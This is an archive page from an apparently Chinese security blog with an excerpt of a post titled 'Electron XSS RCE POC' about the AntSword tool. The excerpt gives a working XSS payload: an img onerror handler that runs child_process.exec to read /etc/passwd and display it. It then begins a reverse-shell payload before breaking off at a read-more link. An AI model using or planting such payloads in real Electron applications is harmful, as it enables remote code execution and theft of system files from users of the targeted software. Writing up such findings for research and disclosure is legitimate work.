2019年04月的内容

未分类

Electron XSS RCE POC

Electron XSS RCE POC
蚁剑用Electron开发,当前程序的上下文应该是node,于是我们可以调用node模块进行RCE POC <img src=# onerror="require('child_process').exec('cat /etc/passwd',(error, stdout, stderr)=>{ alert(`stdout: ${stdout}`); });"> 反弹shell requir……继续阅读 »

Admin 5个月前 (04-15) 293浏览 0评论 0个赞